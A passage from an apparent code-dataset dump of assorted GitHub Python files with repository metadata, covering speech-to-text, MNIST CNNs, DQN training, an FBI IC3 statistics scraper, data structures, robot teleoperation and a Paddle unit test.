try:\n transcript = sr.Recognizer().recognize_google(l_recording)\n print(\"Transcript:\",transcript)\n except:#In case Google is unable to recognize\n print(\"Unable to retrieve transcript.\")\n\n#Delete voice recording\nos.remove(\"voicerecording.wav\")\n","repo_name":"Hifa12/Speech-to-Text-Converter","sub_path":"speech-to-text.py","file_name":"speech-to-text.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32180026783","text":"import string\nimport sys\n\ndef text_analyzer(text=None):\n\t'''This function counts the number of upper characters, \nlower characters, punctuation and spaces in a given text.'''\n\tif text is None:\n\t\ttext = input(\"Insert text:\\n\")\n\tif not isinstance(text, str):\n\t\tprint(\"AssertionError: argument is not a string\")\n\telse:\n\t\ttotalchars = len(text)\n\t\tupper = sum(1 for i in text if i.isupper())\n\t\tlower = sum(1 for i in text if i.islower())\n\t\tspace = sum(1 for i in text if i == \" \")\n\t\tpunctuation = sum(1 for i in text if i in string.punctuation)\n\t\tprint(\"The text contains\", totalchars,\"character(s)\")\n\t\tprint(\"-\", upper, \"upper letters(s)\")\n\t\tprint(\"-\", lower, \"lower letter(s)\")\n\t\tprint(\"-\", punctuation, \"punctuation mark(s)\")\n\t\tprint(\"-\", space, \"space(s)\")\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) > 1:\n\t\tif len(sys.argv) == 2:\n\t\t\ttext_analyzer(sys.argv[1])\n\t\telse:\n\t\t\tprint(\"Error: more than one argument are provided\")\n","repo_name":"rafav99/python00","sub_path":"ex03/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"33383616171","text":"r\"\"\" a sample implementation of LAS for HKUST \"\"\"\nimport sys\nimport json\nfrom absl import logging\nfrom athena.main import parse_config, SUPPORTED_DATASET_BUILDER\n\nif __name__ == \"__main__\":\n logging.set_verbosity(logging.INFO)\n if len(sys.argv) < 3:\n logging.warning('Usage: python {} config_json_file data_csv_file'.format(sys.argv[0]))\n sys.exit()\n jsonfile, csv_file = sys.argv[1], sys.argv[2]\n\n with open(jsonfile) as file:\n config = json.load(file)\n p = parse_config(config)\n if \"speed_permutation\" in p.trainset_config:\n p.trainset_config['speed_permutation'] = [1.0]\n dataset_builder = SUPPORTED_DATASET_BUILDER[p.dataset_builder](p.trainset_config)\n dataset_builder.preprocess_data(csv_file).compute_cmvn_if_necessary(True)\n","repo_name":"athena-team/athena","sub_path":"athena/cmvn_main.py","file_name":"cmvn_main.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":920,"dataset":"github-code","pt":"29"} +{"seq_id":"42136050435","text":"import gymnasium as gym\nimport custom_grid\nfrom stable_baselines3 import DQN\nimport os\nimport time\n\nmodels_dir = f\"models/{int(time.time())}/\"\nlogdir = f\"logs/{int(time.time())}/\"\n\nif not os.path.exists(models_dir):\n\tos.makedirs(models_dir)\n\nif not os.path.exists(logdir):\n\tos.makedirs(logdir)\n\n\nenv = gym.make(\"GridWorldEnv-v0\", render_mode=\"human\")\n\nmodel = DQN(\"MultiInputPolicy\", env, verbose=1, tensorboard_log=logdir)\n\n\nTIMESTEPS = 10000\niters = 0\nwhile True:\n\titers += 1\n\tmodel.learn(total_timesteps=TIMESTEPS, reset_num_timesteps=False, tb_log_name=f\"DQN\")\n\tmodel.save(f\"{models_dir}/{TIMESTEPS*iters}\")\n\t\n","repo_name":"AntoineC1990/Jumbo_Challenge","sub_path":"custom_grid/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42943278994","text":"import tensorflow as tf\nfrom tensorflow import keras\n\nfrom sklearn import model_selection\nimport load_mnist\n\n\nX, y, X_test, y_test = load_mnist.load_data()\nX = X.reshape(-1, 28, 28) / 255\nX_test = X_test.reshape(-1, 28, 28) / 255\n\nX_train, X_val, y_train, y_val = model_selection.train_test_split(X, y, test_size=0.1, random_state=42)\n\ninput_ = keras.layers.Input(shape=[28, 28, 1])\nconv1 = keras.layers.Conv2D(64, 5, padding='same', activation='relu')(input_)\nmax_pool1 = keras.layers.MaxPooling2D(2)(conv1)\nconv2 = keras.layers.Conv2D(128, 5, strides=1, padding='same', activation='relu')(max_pool1)\nconv3 = keras.layers.Conv2D(128, 5, strides=1, padding='same', activation='relu')(conv2)\nmax_pool2 = keras.layers.MaxPooling2D(2)(conv3)\nconv4 = keras.layers.Conv2D(256, 3, strides=1, padding='same', activation='relu')(max_pool2)\nconv5 = keras.layers.Conv2D(256, 3, strides=1, padding='same', activation='relu')(conv4)\nmax_pool3 = keras.layers.MaxPooling2D(2)(conv5)\nflatten = keras.layers.Flatten()(max_pool3)\ndense = keras.layers.Dense(128, activation='relu')(flatten)\ndropout = keras.layers.Dropout(0.5)(dense)\noutput = keras.layers.Dense(10, activation='softmax')(dropout)\n\nmodel = keras.Model(inputs=[input_], outputs=[output])\n\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.fit(X_train, y_train, epochs=5, validation_data=(X_val, y_val))\nmodel.evaluate(X_test, y_test)\n","repo_name":"longphanp/my_playground","sub_path":"first_cnn.py","file_name":"first_cnn.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29690598652","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 12 16:05:16 2022\n\n@author: rebecca\n\"\"\"\n\n#ic3\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup as bs\nfrom assistant import parse_it\nfrom pandas_gbq import to_gbq\nfrom time import sleep\nimport pandas as pd\n\ndef get_ic3(driver, wait, today, ic3_table_id):\n\n ic3_years = list(range(2016,2022))\n\n ic3_list = []\n\n for ic3_year in ic3_years:\n \n ic3_url = 'https://www.ic3.gov/Media/PDF/AnnualReport/{}State/StateReport.aspx'.format(str(ic3_year))\n \n driver.get(ic3_url)\n \n for i in range(2,59): \n \n #get selected state from site title\n state_dropdown_xpath = '/html/body/div/form/header/div[2]/h1'\n selected_state = wait.until(EC.element_to_be_clickable((By.XPATH, state_dropdown_xpath))).text\n \n print(ic3_year, selected_state)\n \n #switch to soup\n soup = bs(driver.page_source, 'lxml') \n \n #find all the page tables\n ic3_tables = soup.find_all('table', class_ = 'crimetype')\n\n ic3_table_list = []\n \n for ic3_table in ic3_tables:\n\n #parse table\n this_ic3_table = parse_it(ic3_table)\n \n #convert to dataframe, set headers\n this_ic3_table_df = pd.DataFrame(this_ic3_table, columns = this_ic3_table[0])\n \n #drop the first row\n this_ic3_table_df = this_ic3_table_df.drop(this_ic3_table_df.index[0])\n \n #handle the column's layout\n first_ic3_subset_df = this_ic3_table_df.iloc[:,0:2]\n second_ic3_subset_df = this_ic3_table_df.iloc[:,2:4]\n ic3_df = pd.concat([first_ic3_subset_df, second_ic3_subset_df])\n \n #insert state and source\n ic3_df['state'] = selected_state\n ic3_df['year'] = ic3_year\n ic3_df['url'] = ic3_url\n \n ic3_table_list.append(ic3_df)\n\n #bring it all together\n ic3_dff = ic3_table_list[1].merge(ic3_table_list[0],\n on = ['Crime Type', 'state', 'year']).merge(ic3_table_list[2], \n on = ['Crime Type', 'state', 'year'])\n #drop duplicates (if exists)\n ic3_dff = ic3_dff.drop_duplicates()\n\n #reorder\n ic3_dfff = ic3_dff[['Crime Type', 'state', 'year', 'Subject Count', 'Victim Count', 'Loss Amount']]\n\n #make columns lower case\n ic3_dfff.columns = [x.lower() for x in ic3_dfff.columns.values.tolist()]\n\n #replace column spaces with underscores\n ic3_dfff.columns = [x.replace(' ','_') for x in ic3_dfff.columns.values.tolist()]\n \n #add to the list\n ic3_list.append(ic3_dfff)\n \n #update the url\n updated_url = ic3_url + '#?s={}'.format(str(i))\n \n #get the updated url\n driver.get(updated_url)\n \n sleep(3) \n\n #put it all together\n final_ic3_dff = pd.concat(ic3_list)\n\n #remove duplicates and null records (if exist)\n final_ic3_dff = final_ic3_dff.drop_duplicates()\n final_ic3_dff = final_ic3_dff.dropna(subset = ['subject_count', 'loss_amount', 'victim_count'])\n\n #clean up the $ & , formatting\n final_ic3_dff['loss_amount'] = final_ic3_dff['loss_amount'].str.replace('$','', regex = False).str.replace(',','', regex = False)\n final_ic3_dff['subject_count'] = final_ic3_dff['subject_count'].str.replace(',','', regex = False)\n final_ic3_dff['victim_count'] = final_ic3_dff['victim_count'].str.replace(',','', regex = False)\n final_ic3_dff = final_ic3_dff.reset_index().drop('index', axis = 1)\n \n #convert the non-null counts/amounts into integer type\n for i in range(0, len(final_ic3_dff.index)):\n loss_amount = final_ic3_dff.loc[i, 'loss_amount']\n if loss_amount is not None:\n loss_amount = int(loss_amount)\n final_ic3_dff.loc[i,'loss_amount'] = loss_amount\n \n subject_count = final_ic3_dff.loc[i, 'subject_count']\n if subject_count is not None:\n subject_count = int(subject_count)\n final_ic3_dff.loc[i,'subject_count'] = subject_count\n \n victim_count = final_ic3_dff.loc[i, 'victim_count']\n if victim_count is not None:\n victim_count = int(victim_count)\n final_ic3_dff.loc[i,'victim_count'] = victim_count\n\n #save copy locally\n final_ic3_dff.to_csv('backup-data/ic3_data-{}.csv'.format(today), index = False)\n\n #load to big query\n to_gbq(final_ic3_dff, \n ic3_table_id, \n project_id = 'cyber-crime-360523', \n if_exists = 'replace')\n \n \n ","repo_name":"becca-mayers/cyber-security","sub_path":"ic3_reports.py","file_name":"ic3_reports.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30896982955","text":"\"\"\"\n player\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport logging\n\nfrom mcedit2.rendering.chunkmeshes.entity.biped import ModelBiped\nfrom mcedit2.rendering.chunkmeshes.entity.modelrenderer import ModelRenderer\n\nlog = logging.getLogger(__name__)\n\n\nclass ModelPlayer(ModelBiped):\n id = \"MCEDIT_Player\"\n textureWidth = 64\n textureHeight = 64\n modelTexture = None\n\n def __init__(self, expandOffset=0.0, headOffset=0.0, smallArms=False):\n super(ModelPlayer, self).__init__(expandOffset, headOffset)\n \n self.smallArms = smallArms\n self.bipedCape = ModelRenderer(self, 0, 0)\n # self.bipedCape.setTextureSize(64, 32)\n self.bipedCape.addBox(-5.0, 0.0, -1.0, 10, 16, 1, expandOffset)\n\n if smallArms:\n self.bipedLeftArm = ModelRenderer(self, 32, 48)\n self.bipedLeftArm.addBox(-1.0, -2.0, -2.0, 3, 12, 4, expandOffset)\n self.bipedLeftArm.setCenterPoint(5.0, 2.5, 0.0)\n self.bipedRightArm = ModelRenderer(self, 40, 16)\n self.bipedRightArm.addBox(-2.0, -2.0, -2.0, 3, 12, 4, expandOffset)\n self.bipedRightArm.setCenterPoint(-5.0, 2.5, 0.0)\n self.bipedLeftArmwear = ModelRenderer(self, 48, 48)\n self.bipedLeftArmwear.addBox(-1.0, -2.0, -2.0, 3, 12, 4, expandOffset + 0.25)\n self.bipedLeftArmwear.setCenterPoint(5.0, 2.5, 0.0)\n self.bipedRightArmwear = ModelRenderer(self, 40, 32)\n self.bipedRightArmwear.addBox(-2.0, -2.0, -2.0, 3, 12, 4, expandOffset + 0.25)\n self.bipedRightArmwear.setCenterPoint(-5.0, 2.5, 10.0)\n \n else:\n self.bipedLeftArm = ModelRenderer(self, 32, 48)\n self.bipedLeftArm.addBox(-1.0, -2.0, -2.0, 4, 12, 4, expandOffset)\n self.bipedLeftArm.setCenterPoint(5.0, 2.0, 0.0)\n self.bipedLeftArmwear = ModelRenderer(self, 48, 48)\n self.bipedLeftArmwear.addBox(-1.0, -2.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n self.bipedLeftArmwear.setCenterPoint(5.0, 2.0, 0.0)\n self.bipedRightArmwear = ModelRenderer(self, 40, 32)\n self.bipedRightArmwear.addBox(-3.0, -2.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n self.bipedRightArmwear.setCenterPoint(-5.0, 2.0, 10.0)\n \n self.bipedLeftLeg = ModelRenderer(self, 16, 48)\n self.bipedLeftLeg.addBox(-2.0, 0.0, -2.0, 4, 12, 4, expandOffset)\n self.bipedLeftLeg.setCenterPoint(1.9, 12.0, 0.0)\n self.bipedLeftLegwear = ModelRenderer(self, 0, 48)\n self.bipedLeftLegwear.addBox(-2.0, 0.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n self.bipedLeftLegwear.setCenterPoint(1.9, 12.0, 0.0)\n self.bipedRightLegwear = ModelRenderer(self, 0, 32)\n self.bipedRightLegwear.addBox(-2.0, 0.0, -2.0, 4, 12, 4, expandOffset + 0.25)\n self.bipedRightLegwear.setCenterPoint(-1.9, 12.0, 0.0)\n self.bipedBodyWear = ModelRenderer(self, 16, 32)\n self.bipedBodyWear.addBox(-4.0, 0.0, -2.0, 8, 12, 4, expandOffset + 0.25)\n self.bipedBodyWear.setCenterPoint(0.0, 0.0, 0.0)\n\n @property\n def parts(self):\n return [\n self.bipedHead,\n self.bipedHeadwear,\n self.bipedBody,\n self.bipedBodyWear,\n self.bipedRightArm,\n self.bipedRightArmwear,\n self.bipedLeftArm,\n self.bipedLeftArmwear,\n self.bipedRightLeg,\n self.bipedRightLegwear,\n self.bipedLeftLeg,\n self.bipedLeftLegwear,\n ]\n","repo_name":"mcedit/mcedit2","sub_path":"src/mcedit2/rendering/chunkmeshes/entity/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"29"} +{"seq_id":"1887334151","text":"N = int(input())\nl = list(map(int, input().split()))\nallowance = int(input())\nanswer = 0\n\ndef calc(limit):\n left = allowance\n for x in l:\n left -= min(limit, x)\n if left < 0:\n return False\n\n return True\n\n\ndef bsearch(start, end):\n # print(f\"start: {start}, end: {end}\")\n global answer\n\n mid = (start + end) // 2\n\n if calc(mid):\n answer = mid\n if start != end:\n bsearch(mid + 1, end)\n else:\n if start != end and start <= mid - 1:\n bsearch(start, mid - 1)\n\n\nbsearch(0, max(l))\nprint(answer)\n","repo_name":"qpzm/PS","sub_path":"boj/2512/2512.py","file_name":"2512.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"33949912213","text":"import requests\nimport json\n\ndef calRoutes(start, stop):\n url = 'http://router.project-osrm.org/route/v1/driving/' + start + ';' + stop + '?geometries=geojson&overview=simplified&steps=false'\n response = requests.get(url)\n data = response.json()\n try:\n routes = data[\"routes\"][0][\"geometry\"]\n return routes\n except KeyError:\n return\n\nstart = '-87.683593,41.991178'\nstop = '-87.5761197602,41.78101637196'\nroutes = calRoutes(start, stop)\nprint(routes)\n\njson.dumps(routes,sort_keys=True,indent=4)","repo_name":"QuinnXu/DivvyBikes-Visualisation","sub_path":"Data scripts/raw_data/statistic_route/route_osrm.py","file_name":"route_osrm.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1165615294","text":"# topo sortして、leafを全部塗る、そして、条件を満たしている分を上にbottom-upで塗って行く\n\nimport sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(v):\n visited[v] = True\n for nv in G[v]:\n if visited[nv]: continue\n dfs(nv)\n path.append(v)\n\nN = int(input())\nG = [[] for _ in range(N+1)]\ncol = [0]*(N+1)\npath = []\nvisited = [False]*(N+1)\n\nfor _ in range(N-1):\n a, b = map(int, input().split())\n G[a].append(b)\n G[b].append(a)\n \ndfs(1)\n\ncnt = 0\nfor i in range(N):\n v = path[i]\n is_ok = True\n for nv in G[v]:\n if col[nv] == 1: \n is_ok = False\n break\n if is_ok: \n col[v] = 1\n cnt += 1\n if cnt == N//2:\n break\n\nfor i in range(N+1):\n if col[i]: print(i, end=' ')\nprint()","repo_name":"shiroyang/AtcoderSubmission","sub_path":"atcoder.jp/typical90/typical90_z/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15283762805","text":"from time import sleep\nimport sys\nsys.path.append('/home/ubuntu/Desktop/embedded-labs/tankbot')\nfrom libs.tiva import *\nimport pygame\n\n# Define the initial velocities\nleft_velocity = 0\nright_velocity = 0\n\n# Define two velocity options\nvelocities = {\n '1': 30,\n '2': 35\n}\n\n# Current velocity option>\ncurrent_velocity = 30 # Default to 50\n\n# Function to update motor velocities and LED control\ndef update_motors_and_leds():\n motors.move(left_velocity, right_velocity)\n # Leds.write(0, 1, 0, 1) # You can change the LED pattern here\n\n# Initialize pygame\npygame.init()\n\n# Function to handle key presses\ndef on_key_press(key):\n global left_velocity, right_velocity, current_velocity\n if key == pygame.K_UP:\n left_velocity = current_velocity\n right_velocity = current_velocity\n elif key == pygame.K_DOWN:\n left_velocity = -current_velocity\n right_velocity = -current_velocity\n elif key == pygame.K_LEFT:\n left_velocity = -current_velocity\n right_velocity = current_velocity\n elif key == pygame.K_RIGHT:\n left_velocity = current_velocity\n right_velocity = -current_velocity\n elif key == pygame.K_ESCAPE: # Exit the program with the Esc key\n pygame.quit()\n sys.exit()\n elif key == pygame.K_SPACE: # Stop the motors with the Space key\n left_velocity = 0\n right_velocity = 0\n motors.stop()\n elif key.isdigit() and key in velocities: # Check if a number key (1 or 2) is pressed\n if key == \"1\":\n Leds.write(1, 0, 0, 0)\n elif key == \"2\":\n Leds.write(0, 1, 0, 0)\n current_velocity = velocities[key]\n print(f\"Selected velocity: {current_velocity}\")\n update_motors_and_leds()\n\nif __name__ == \"__main__\":\n tiva1 = InitSerial(baud=9600)\n motors = Motors(serial_instance=tiva1)\n Leds = LedControl(serial_instance=tiva1)\n Leds.init_system(cam=0) # Repair cam=1\n\n update_motors_and_leds()\n\n # Main event loop\n while True:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n on_key_press(event.key)\n elif event.type == pygame.KEYUP:\n if event.key in (pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT):\n left_velocity = 0\n right_velocity = 0\n motors.stop()\n update_motors_and_leds()\n sleep(0.01) # Add a small delay to control the loop speed\n","repo_name":"97hackbrian/embedded-labs","sub_path":"tankbot/scr/TeleOp3.py","file_name":"TeleOp3.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"71953090959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: hussein\n\"\"\"\n\nimport csv\n\nwith open('robot1.csv', 'w', newline='') as f:\n fieldnames = ['column1', 'column2', 'column3']\n thewriter = csv.DictWriter(f, fieldnames=fieldnames)\n \n thewriter.writeheader()\n for i in range(1,5):\n thewriter.writerow({'column1' : 'one', 'column2' : 'two', 'column3' : 'three'})\n \n ","repo_name":"HusseinLezzaik/Deep-Learning-for-Multi-Robotics","sub_path":"Two Robots Topology Graph/Data Collection/CSV read code/csvdic_write.py","file_name":"csvdic_write.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"29"} +{"seq_id":"36028736211","text":"import unittest\n\nimport numpy as np\nfrom test_imperative_base import new_program_scope\n\nimport paddle\nfrom paddle import base\nfrom paddle.base import core\nfrom paddle.base.dygraph.base import to_variable\n\n\nclass RecurrentTest(paddle.nn.Layer):\n def __init__(self, name_scope):\n super().__init__(name_scope)\n\n def forward(self, in1, in2):\n out = paddle.matmul(in1, in2)\n sum_out = paddle.sum(out)\n return sum_out, out\n\n\nclass TestRecurrentFeed(unittest.TestCase):\n def test_recurrent_feed(self):\n seed = 90\n original_np1 = np.arange(1, 5).reshape(2, 2).astype(\"float32\")\n original_np2 = np.arange(5, 9).reshape(2, 2).astype(\"float32\")\n with base.dygraph.guard():\n base.default_startup_program().random_seed = seed\n base.default_main_program().random_seed = seed\n original_in1 = to_variable(original_np1)\n original_in2 = to_variable(original_np2)\n original_in1.stop_gradient = False\n original_in2.stop_gradient = False\n rt = RecurrentTest(\"RecurrentTest\")\n\n for i in range(3):\n sum_out, out = rt(original_in1, original_in2)\n out.retain_grads()\n original_in1 = out\n sum_out_value = sum_out.numpy()\n sum_out.backward()\n dyout = out.gradient()\n original_in1.stop_gradient = True\n rt.clear_gradients()\n\n with base.dygraph.guard():\n base.default_startup_program().random_seed = seed\n base.default_main_program().random_seed = seed\n original_in1 = to_variable(original_np1)\n original_in2 = to_variable(original_np2)\n original_in1.stop_gradient = False\n original_in2.stop_gradient = False\n rt = RecurrentTest(\"RecurrentTest\")\n\n for i in range(3):\n sum_out, out = rt(original_in1, original_in2)\n out.retain_grads()\n original_in1 = out\n eager_sum_out_value = sum_out.numpy()\n sum_out.backward()\n eager_dyout = out.gradient()\n original_in1.stop_gradient = True\n rt.clear_gradients()\n\n with new_program_scope():\n base.default_startup_program().random_seed = seed\n base.default_main_program().random_seed = seed\n in1 = paddle.static.data(name=\"inp1\", shape=[2, 2])\n in1.stop_gradient = False\n in2 = paddle.static.data(name=\"inp2\", shape=[2, 2])\n in2.stop_gradient = False\n rt1 = RecurrentTest(\"RecurrentTest\")\n static_sum_out, static_out = rt1(in1, in2)\n base.backward.append_backward(static_sum_out)\n exe = base.Executor(\n base.CPUPlace()\n if not core.is_compiled_with_cuda()\n else base.CUDAPlace(0)\n )\n\n static_dout = (\n base.default_main_program()\n .block(0)\n ._find_var_recursive(static_out.name + \"@GRAD\")\n )\n fetch_list = [static_sum_out, static_out, static_dout]\n for i in range(3):\n out = exe.run(\n base.default_main_program(),\n feed={\"inp1\": original_np1, \"inp2\": original_np2},\n fetch_list=fetch_list,\n )\n static_out_value = out[1]\n static_sum_out = out[0]\n static_dout = out[2]\n original_np1 = static_out_value\n\n np.testing.assert_array_equal(static_sum_out, sum_out_value)\n np.testing.assert_array_equal(static_sum_out, eager_sum_out_value)\n np.testing.assert_array_equal(static_dout, dyout)\n np.testing.assert_array_equal(static_dout, eager_dyout)\n\n\nif __name__ == '__main__':\n paddle.enable_static()\n unittest.main()\n","repo_name":"PaddlePaddle/Paddle","sub_path":"test/legacy_test/test_imperative_recurrent_usage.py","file_name":"test_imperative_recurrent_usage.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"16589881705","text":"#!/usr/python3\n\nclass Node:\n\n def __init__(self, name, age, sex):\n self.name = name\n self.age = age\n self.sex = sex\n self.next = None\n self.prev = None\n\n\nclass DoublyLinkedList:\n\n def __init__(self):\n self.head = None\n\n def length(self):\n cur = self.head\n total = 0\n while cur.next is not None:\n total += 1\n cur = cur.next\n return total\n \n # insert node at the front\n def insert_front(self, name, age, sex):\n\n new_node = Node(name, age, sex)\n new_node.next = self.head\n if self.head is not None:\n self.head.prev = new_node\n self.head = new_node\n\n def insert_after(self, prev_node, name, age, sex):\n cur_node = self.head\n pos = 1\n if pos <= prev_node:\n cur_node = cur_node.next\n pos += 1\n new_node = Node(name, age, sex)\n new_node.next = cur_node.next\n cur_node.next = new_node\n new_node.prev = cur_node\n if new_node.next:\n new_node.next.prev = new_node\n\n def insert_end(self, name, age, sex):\n new_node = Node(name, age, sex)\n if self.head is None:\n self.head = new_node\n return\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = new_node\n new_node.prev = temp\n return\n\n def deleteNode(self, dele):\n if self.head is None or dele is None:\n return\n if self.head == dele:\n self.head = dele.next\n if dele.next is not None:\n dele.next.prev = dele.prev\n if dele.prev is not None:\n dele.prev.next = dele.next\n\n def display_list(self):\n cur_node = self.head\n while cur_node is not None:\n print(\"Name: {}\\nAge: {}\\nSex: {}\\n\".format(\n cur_node.name, cur_node.age, cur_node.sex))\n last = cur_node\n cur_node = cur_node.next\n\n\n# initialize an empty node\nmy_list = DoublyLinkedList()\n\nmy_list.insert_end(\"Mzee John\", 30, \"Male\")\nmy_list.insert_front(\"Mukasa Joseph\", 27, \"Male\")\nmy_list.insert_front(\"Cecilia Tusingwire\", 24, \"Female\")\nmy_list.insert_end(\"Charles Mwesige\", 32, \"Male\")\n\n# index = 4\n# my_list.insert_after(1, \"Aaron\", 20, \"Male\")\n\nmy_list.insert_after(1, \"Karungi\", 23, \"Female\")\n\nmy_list.display_list()\n\n# my_list.deleteNode(my_list.head.next.next.next.next.next)\n\nprint()\n# my_list.display_list()\n","repo_name":"Mzee1991/Python-Training","sub_path":"Doub-l-2.py","file_name":"Doub-l-2.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"11512382871","text":"import tensorflow as tf # deep learning library. Tensors are just multi-dimensional arrays\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n\nnp.random.seed(2)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n\n\nfrom keras.utils.np_utils import to_categorical # convert to one-hot-encoding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ReduceLROnPlateau\n\ntrain = pd.read_csv(\"data/mnist_train.csv\")\ntest = pd.read_csv(\"data/mnist_test.csv\")\n\nY_train = train[\"label\"]\nX_train = train.drop(labels = [\"label\"],axis = 1) \nY_test = test[\"label\"]\nX_test = test.drop(labels = [\"label\"],axis = 1) \n\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n\nX_train = X_train.values.reshape(-1,28,28,1)\nX_test = X_test.values.reshape(-1,28,28,1)\n\nY_train = to_categorical(Y_train, num_classes = 10)\nY_test = to_categorical(Y_test,num_classes = 10)\nrandom_seed = 2\nX_train, X_val, Y_train, Y_val = train_test_split(X_train, Y_train, test_size = 0.1, random_state=random_seed)\n\nmodel = Sequential()\n\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5),padding = 'Same', \n activation ='relu', input_shape = (28,28,1)))\nmodel.add(Conv2D(filters = 32, kernel_size = (5,5),padding = 'Same', \n activation ='relu'))\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n\n\nmodel.add(Conv2D(filters = 64, kernel_size = (3,3),padding = 'Same', \n activation ='relu'))\nmodel.add(Conv2D(filters = 64, kernel_size = (3,3),padding = 'Same', \n activation ='relu'))\nmodel.add(MaxPool2D(pool_size=(2,2), strides=(2,2)))\nmodel.add(Dropout(0.25))\n\n\nmodel.add(Flatten())\nmodel.add(Dense(256, activation = \"relu\"))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation = \"softmax\"))\n\noptimizer = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\nmodel.compile(optimizer = optimizer , loss = \"categorical_crossentropy\", metrics=[\"accuracy\"])\n\nlearning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', \n patience=3, \n verbose=1, \n factor=0.5, \n min_lr=0.00001)\n\nepochs = 3 # Turn epochs to 30 to get 0.9967 accuracy\nbatch_size = 86\n\ndatagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\n zoom_range = 0.1, # Randomly zoom image \n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=False, # randomly flip images\n vertical_flip=False) # randomly flip images\n\ndatagen.fit(X_train)\n\nhistory = model.fit_generator(datagen.flow(X_train,Y_train, batch_size=batch_size),\n epochs = epochs, validation_data = (X_val,Y_val),\n verbose = 2, steps_per_epoch=X_train.shape[0] // batch_size\n , callbacks=[learning_rate_reduction])\n\nval_loss, val_acc = model.evaluate(X_test, Y_test) # evaluate the out of sample data with model\nprint(val_loss) # model's loss (error)\nprint(val_acc) # model's accuracy\nmodel.save('désespoir.h5')\n\n","repo_name":"Tateuf/AI_project","sub_path":"web_app/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"70864049359","text":"\"\"\"\n---\ntitle: Attention with Linear Biases (ALiBi)\nsummary: >\n Documented implementation with explanations of Attention with Linear Biases (ALiBi)\n---\n\n# Attention with Linear Biases (ALiBi)\n\nThis is an implementation of Attention with Linear Biases (ALiBi) from the paper\n[Train Short, Test Long: Attention with Linear Biases Enables Input Length Extrapolation](https://papers.labml.ai/paper/2108.12409).\n\nThis replaces positional encodings with biases added to attention scores (attention logits, before the softmax).\nThis is a relative scheme tested on autoregressive tasks, and the bias is higher for closeby tokens\nand lower for far-away tokens.\nThe biases decrease linearly in the log scale (because it's before the softmax) and each head has a different slope.\n\nHere's the attention formula for $i$-th token,\n\n\\begin{align}\n\\mathbf{a}_i\n&= \\text{softmax} \\bigg( \\mathbf{q}_i \\mathbf{K}^\\top + m \\cdot \\big[-(i-1), \\dots, 1, 0 \\big] 